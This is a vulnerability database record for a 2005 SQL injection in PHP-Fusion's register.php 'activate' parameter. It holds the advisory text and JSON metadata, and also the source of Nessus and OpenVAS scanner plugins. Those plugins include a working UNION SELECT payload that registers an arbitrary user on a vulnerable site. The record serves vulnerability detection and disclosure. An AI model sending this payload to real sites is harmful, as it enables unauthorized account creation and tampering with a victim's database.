ID OSVDB:19866 Type osvdb Reporter Andreas Sandblad(as@secunia.com) Modified 2005-10-06T04:45:44
Description
Vulnerability Description
PHP-Fusion contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'register.php' script not properly sanitizing user-supplied input to the 'activate' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.
Technical Description
This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'. Enabling magic_quotes_gpc is not a substitute for the fix described below: it is a blanket escaping mechanism rather than proper input validation, was deprecated in PHP 5.3 and removed in PHP 5.4, so the upgrade is still required.
Solution Description
Upgrade to version 6.00.110 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Short Description
PHP-Fusion contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'register.php' script not properly sanitizing user-supplied input to the 'activate' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.
References:
Vendor URL: http://www.php-fusion.co.uk/
Security Tracker: 1015013
Secunia Advisory ID: 17055
Related OSVDB ID: 19867
Other Advisory URL: http://secunia.com/secunia_research/2005-52/advisory/
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0130.html
ISS X-Force ID: 22532
CVE-2005-3161
Bugtraq ID: 15018
{"enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2017-04-28T13:20:16"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3161"]}, {"type": "nessus", "idList": ["PHP_FUSION_6_00_110.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231020009"]}], "modified": "2017-04-28T13:20:16"}, "vulnersScore": 6.9}, "bulletinFamily": "software", "affectedSoftware": [{"name": "PHP-Fusion", "operator": "eq", "version": "6.00.109"}], "references": [], "href": "https://vulners.com/osvdb/OSVDB:19866", "id": "OSVDB:19866", "title": "PHP-Fusion register.php activate Variable SQL Injection", "history": [], "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "lastseen": "2017-04-28T13:20:16", "edition": 1, "hash": "bdc5fdcef218d0d722c2bac71086a1fc80babd569ae0f4691c29459f74c92980", "objectVersion": "1.2", "reporter": "Andreas Sandblad(as@secunia.com)", "description": "## Vulnerability Description\nPHP-Fusion contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'register.php' script not properly sanitizing user-supplied input to the 'activate' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Solution Description\nUpgrade to version 6.00.110 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP-Fusion contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'register.php' script not properly sanitizing user-supplied input to the 'activate' variable. 
This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## References:\nVendor URL: http://www.php-fusion.co.uk/\nSecurity Tracker: 1015013\n[Secunia Advisory ID:17055](https://secuniaresearch.flexerasoftware.com/advisories/17055/)\n[Related OSVDB ID: 19867](https://vulners.com/osvdb/OSVDB:19867)\nOther Advisory URL: http://secunia.com/secunia_research/2005-52/advisory/\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0130.html\nISS X-Force ID: 22532\n[CVE-2005-3161](https://vulners.com/cve/CVE-2005-3161)\nBugtraq ID: 15018\n", "modified": "2005-10-06T04:45:44", "viewCount": 1, "published": "2005-10-06T04:45:44", "cvelist": ["CVE-2005-3161"], "hashmap": [{"key": "affectedSoftware", "hash": "9048a6a85cdf1383d8d80d57dd431752"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d1dd9b0b6cadcfcc3f7b6f89fe806641"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "99bc16e62c3b2eb16a973c9c69c276b8"}, {"key": "href", "hash": "b9bbe50f454f6f3a646683c59a65a671"}, {"key": "modified", "hash": "5e20594211df0451c757573f4f8f629b"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "5e20594211df0451c757573f4f8f629b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "4c34e35a4f9c924323262b776e30699c"}, {"key": "title", "hash": "87c691e541b7e0e000311855b469e2da"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}]}
{"cve": [{"lastseen": "2019-05-29T18:08:15", "bulletinFamily": "NVD", "description": "Multiple SQL injection vulnerabilities in PHP-Fusion before 6.00.110 allow remote attackers to execute arbitrary SQL commands via (1) the activate parameter in register.php and (2) the cat_id parameter in faq.php.", "modified": "2017-07-11T01:33:00", "id": "CVE-2005-3161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3161", "published": "2005-10-06T10:02:00", "title": "CVE-2005-3161", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-01T03:20:02", "bulletinFamily": "scanner", "description": "The remote version of this software is vulnerable to multiple SQL\ninjection attacks due to its failure to properly sanitize certain\nparameters. Provided PHP", "modified": "2019-11-02T00:00:00", "id": "PHP_FUSION_6_00_110.NASL", "href": "https://www.tenable.com/plugins/nessus/20009", "published": "2005-10-12T00:00:00", "title": "PHP-Fusion < 6.00.110 Multiple Scripts SQL Injection", "type": "nessus", "sourceData": "#\n# Josh Zlatin-Amishav (josh at ramat dot cc)\n# GPLv2\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(20009);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\n \"CVE-2005-3157\",\n \"CVE-2005-3158\",\n \"CVE-2005-3160\",\n \"CVE-2005-3161\"\n );\n script_bugtraq_id(\n 14964,\n 14992,\n 15005,\n 15018\n );\n\n script_name(english:\"PHP-Fusion < 6.00.110 Multiple Scripts SQL Injection\");\n script_summary(english:\"Checks for SQL injection in PHP-Fusion's register.php\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains several PHP scripts that are vulnerable to\nSQL injection flaws.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote version of this software is vulnerable to multiple SQL\ninjection attacks due to its failure to properly sanitize certain\nparameters. 
Provided PHP's 'magic_quotes_gpc' setting is disabled,\nthese flaws allow an attacker to manipulate database queries, which\nmay result in the disclosure or modification of data.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2005/Oct/51\");\n script_set_attribute(attribute:\"see_also\", value:\"https://secuniaresearch.flexerasoftware.com/secunia_research/2005-52/advisory\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to at least version 6.00.110 of PHP-Fusion.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/07/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/05\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php_fusion:php_fusion\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"(C) 2005-2018 Josh Zlatin-Amishav\");\n\n script_dependencies(\"php_fusion_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/php_fusion\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"url_func.inc\");\n\n\nport = get_http_port(default:80);\nif (!get_port_state(port)) exit(0);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item_or_exit(string(\"www/\", port, \"/php_fusion\"));\nmatches = eregmatch(string:install, pattern:\"^(.+) under 
(/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n dir = matches[2];\n\n if (!safe_checks()) {\n # Make sure 'register.php' exists -- it's used in the exploit.\n req = http_get(item:string(dir, \"/register.php\"), port:port);\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n if (res == NULL) exit(0);\n\n # If it does...\n if (\"<form name='inputform' method='post' action='register.php'\" >< res) {\n # Try to exploit the flaw to register a user.\n user = rand_str(charset:\"abcdefghijklmnopqrstuvwxyz0123456789_\");\n pass = rand_str();\n email = string(user, \"@\", get_host_name());\n sploit = string(\n \"UNION SELECT \",\n '\"\",',\n '\"\",',\n '0,',\n \"'a:4:{\",\n 's:9:\"user_name\";s:', strlen(user), ':\"', user, '\";',\n 's:13:\"user_password\";s:', strlen(pass), ':\"', pass, '\";',\n 's:10:\"user_email\";s:', strlen(email), ':\"', email, '\";',\n 's:15:\"user_hide_email\";s:1:\"1\";',\n \"}\"\n );\n #\n # nb: the code sanitizes GETs so we can't use that.\n postdata = string(\"activate=\", rand_str(), \"'+\", urlencode(str:sploit));\n req = string(\n \"POST \", dir, \"/register.php?plugin=\", SCRIPT_NAME, \" HTTP/1.1\\r\\n\",\n \"Host: \", get_host_name(), \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\",\n postdata\n );\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n if (res == NULL) exit(0);\n\n if ( \"Your account has been verified.\" >< res)\n {\n if (report_verbosity > 0) {\n report = string(\n \"\\n\",\n \"Nessus has successfully exploited one of the flaws by adding\\n\",\n \"the user '\", user, \"' to PHP-Fusion on the remote host.\\n\"\n );\n security_warning(port:port, extra:report);\n }\n else\n security_warning(port:port);\n\n\tset_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n }\n\n # Check the version number in case registrations are disabled or safe checks are enabled.\n if 
(ver =~ \"^([0-5][.,]|6[.,]00[.,](0|10[0-9]))\") {\n report =\n\"***** Nessus has determined the vulnerability exists on the remote\n***** host simply by looking at the version number of PHP-Fusion\n***** installed there.\";\n security_warning(port:port, extra:report);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:31:57", "bulletinFamily": "scanner", "description": "The remote version of PHP-Fusion is vulnerable to multiple SQL\n injection attacks due to its failure to properly sanitize certain parameters.", "modified": "2018-10-29T00:00:00", "published": "2006-03-26T00:00:00", "id": "OPENVAS:136141256231020009", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231020009", "title": "PHP-Fusion < 6.00.110 Multiple SQL Injection Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: php_fusion_6_00_110.nasl 12150 2018-10-29 11:46:42Z cfischer $\n#\n# PHP-Fusion < 6.00.110 Multiple SQL Injection Vulnerabilities\n#\n# Authors:\n# Josh Zlatin-Amishav (josh at ramat dot cc)\n#\n# Copyright:\n# Copyright (C) 2005 Josh Zlatin-Amishav\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php-fusion:php-fusion\";\n\n# Updated: 04/07/2009\n# Antu Sanadi <santu@secpod.com>\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.20009\");\n script_version(\"$Revision: 12150 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-29 12:46:42 +0100 (Mon, 29 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2005-3157\", \"CVE-2005-3158\", \"CVE-2005-3160\", \"CVE-2005-3161\");\n script_bugtraq_id(14964, 14992, 15005, 15018);\n script_name(\"PHP-Fusion < 6.00.110 Multiple SQL Injection Vulnerabilities\");\n script_category(ACT_MIXED_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"(C) 2005 Josh Zlatin-Amishav\");\n script_dependencies(\"secpod_php_fusion_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"php-fusion/installed\");\n\n script_xref(name:\"URL\", value:\"http://securityfocus.org/archive/1/411909\");\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/secunia/2005-q4/0021.html\");\n\n script_tag(name:\"solution\", value:\"Update to at least version 6.00.110 of PHP-Fusion.\");\n\n script_tag(name:\"summary\", value:\"The remote version of PHP-Fusion is vulnerable to multiple SQL\n injection attacks due to its failure to properly sanitize certain parameters.\");\n\n script_tag(name:\"impact\", value:\"Provided PHP's 'magic_quotes_gpc' setting is disabled, these flaws\n allow an 
attacker to manipulate database queries, which may result in the disclosure or\n modification of data.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"url_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:FALSE ) ) exit( 0 );\nver = infos['version'];\ndir = infos['location'];\n\nif( ! safe_checks() ) {\n\n vtstrings = get_vt_strings();\n if( dir == \"/\" ) dir = \"\";\n\n user = rand_str(charset:\"abcdefghijklmnopqrstuvwxyz0123456789_\");\n pass = rand_str();\n email = string(user, \"@\", get_host_name());\n sploit = string(\"UNION SELECT \",'\"\",', '\"\",', '0,',\"'a:4:{\",\n 's:9:\"user_name\";s:', strlen(user), ':\"', user, '\";',\n 's:13:\"user_password\";s:', strlen(pass), ':\"', pass, '\";',\n 's:10:\"user_email\";s:', strlen(email), ':\"', email, '\";',\n 's:15:\"user_hide_email\";s:1:\"1\";',\n \"}\");\n\n postdata = string(\"activate=\", rand_str(), \"'+\", urlencode(str:sploit));\n url = dir + \"/register.php?plugin=\" + vtstrings[\"lowercase\"];\n req = http_post(item:url, port:port, data:postdata);\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n if( !res ) exit( 0 );\n\n if( \"Your account has been verified.\" >< res ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( version_is_less_equal( version:ver, test_version:\"6.00.100\" ) ) {\n report = report_fixed_ver( installed_version:ver, fixed_version:\"6.00.110\" );\n security_message( port:port, data:report );\n}\n\nexit( 0 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}